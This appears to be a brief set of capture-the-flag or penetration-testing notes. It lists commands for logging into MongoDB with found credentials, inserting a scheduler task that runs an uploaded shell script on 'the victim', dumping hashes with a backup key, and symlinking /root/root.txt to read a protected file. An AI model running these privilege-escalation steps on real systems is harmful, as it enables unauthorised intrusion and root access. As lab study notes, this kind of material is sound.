mongo db creds found?
try:
mongo -u username -p PASS authSource(i.e scheduler)
note db.collection('NAME') for database name.
upload the shell to the victim.
then do: on victim
db.tasks.insert({ "cmd": "/bin/bash /tmp/shell.sh;" } );
WriteResult({ "nInserted" : 1 })
Back up key found?
copy the key and use it with:
./backup -q hashes /tmp
this will create base64 file.
decide it and see what kind of file it is.
---
Link root.txt to a tmp file;
mkdir /tmp/gori
ln -s /root/root.txt /tmp/gori
Last updated